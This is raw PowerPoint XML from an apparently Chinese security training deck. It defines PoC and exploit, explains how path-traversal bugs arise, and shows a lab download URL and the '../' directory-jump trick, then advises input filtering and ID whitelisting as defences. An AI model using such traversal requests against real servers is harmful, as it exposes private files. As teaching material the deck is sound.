                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"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none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"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CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>全称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Proof </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Concept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>报告中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>oC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>一段说明或者一个攻击的样例，使得读者能够确认这个漏洞是真实存在的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>一般不具有攻击性和破坏性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"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a typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838184" y="2085024"/>
            <a:ext cx="8612943" cy="1754326"/>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none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"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CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>全称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码，可以使得读者完全了解漏洞的机理以及利用的方法。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>一般是具有攻击性的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，一旦有公开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>的漏洞，威胁等级就很高了。</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a typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838186" y="3638623"/>
            <a:ext cx="8357652" cy="923330"/>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要使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>变成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>通常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>绕过众多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>限制和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>防护机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>，该过程的难度较大，某些“品相”不好的漏洞，几乎是变不成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>的，这类漏洞只能是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2938695" y="4608727"/>
            <a:ext cx="5809524" cy="1190476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="644900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2400657"/>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文件遍历漏洞</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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>成因：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>提供下载文件的功能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户提供的文件名作为参数。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务端使用用户参数拼接文件全路径。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2788579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015663"/>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文件遍历漏洞案列</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="914666"/>
            <a:ext cx="9095238" cy="4266667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914746" y="2855712"/>
            <a:ext cx="5542857" cy="819048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914746" y="5431140"/>
            <a:ext cx="8091555" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>http://192.168.4.144:8081/Test2/DownLoadFile?filename=dama.jsp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4040548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569660"/>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文件遍历漏洞案列</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目录跳转符 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="924595" y="1457585"/>
            <a:ext cx="10723809" cy="4171429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2322635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292662"/>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文件遍历漏洞案列</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>文件反汇编为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>文件后的代码，是非常容易阅读的，和源码没两样。。</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114424" y="1406196"/>
            <a:ext cx="9814713" cy="4165589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2130478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538883"/>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如何防范文件遍历漏洞</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过滤用户输入中敏感字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>: ../</a:t>
            </a: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sz="1600"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不提供文件名作为参数，建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>和资源文件对应关系，相当于做一个白名单。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
